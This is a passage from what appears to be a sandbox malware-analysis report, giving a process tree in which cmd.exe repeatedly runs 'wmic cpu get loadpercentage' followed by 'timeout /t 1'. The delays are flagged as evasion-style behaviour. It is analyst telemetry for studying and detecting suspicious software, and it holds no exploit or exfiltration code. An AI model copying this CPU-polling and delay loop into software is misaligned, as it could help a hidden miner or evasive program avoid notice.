  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:796
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4680
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2308
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5004
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3764
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5076
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4000
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5020
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4192
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:224
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1512
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3008
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4884
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1852
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:384
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3216
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:412
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1520
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5036
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3532
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2864
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2788
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1300
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1064
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2780
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1360
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2932
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4640
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3040
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4136
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4176
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3360
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3496
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4984
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4264
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1952
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2816
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5092
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1824
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3744
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1888
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2868
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3828
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2836
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4944
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3268
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4432
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2328
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4936
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:296
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1164
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4484
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1972
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4500
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2396
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3056
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4688
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1496
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4380
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5104
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:496
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5108
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4916
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2372
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5100
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4568
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4928
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2408
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2744
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4412
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:740
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1168
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3176
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4428
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2752
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2308
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2656
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3600
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4076
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2404
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4152
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5116
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1020
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1512
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3008
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2440
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1852
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2224
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:384
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4684
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:376
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4240
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:420
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:996
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2864
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1032
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2992
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1064
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1544
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2932
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3044
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4640
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1084
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3504
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3360
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4988
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3476
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4264
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2240
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1832
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3300
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2840
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4932
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:5000
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1372
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2332
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3924
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3656
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2936
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1464
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3824
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2328
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4248
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1164
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3232
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4200
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4292
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5028
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3056
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4688
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3788
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1496
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5104
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:664
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4464
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4384
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5112
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3480
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4592
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1228
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4940
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4928
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:380
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3324
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:340
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4360
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1320
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2832
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4324
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1200
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1548
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3600
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4496
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:508
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4152
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2316
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3012
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2920
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1240
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1736
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4044
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1296
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1148
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1000
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3532
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1048
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4524
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1300
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1608
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2916
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2780
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3040
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2740
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4528
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4624
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:64
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2532
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4312
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:616
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4956
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4308
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2796
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2688
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1036
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2840
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4664
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4644
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1372
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2808
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4180
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3656
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:480
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3148
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3800
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2152
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1828
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3232
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:852
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3796
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1840
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2300
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:644
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3788
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4400
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2844
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:664
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3880
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4820
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3076
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3272
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4568
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4592
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1772
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3036
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4928
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1168
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4360
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:292
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4164
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3176
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4912
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1588
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5020
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5004
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4100
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1672
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4012
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2944
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3984
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1336
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1240
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1668
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1508
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1296
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4240
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1052
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:420
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1848
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2864
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1032
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2992
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3028
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2964
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2932
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3064
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3540
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:64
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4176
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3972
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4312
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1288
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1952
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1488
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4308
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4084
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5000
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2840
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3904
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2836
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1076
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2808
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1464
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4348
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4436
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4936
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4144
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2152
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1972
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4004
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4852
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1356
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4392
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1644
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4380
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1496
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:588
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2384
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4572
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:664
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2680
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2140
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4916
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5052
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
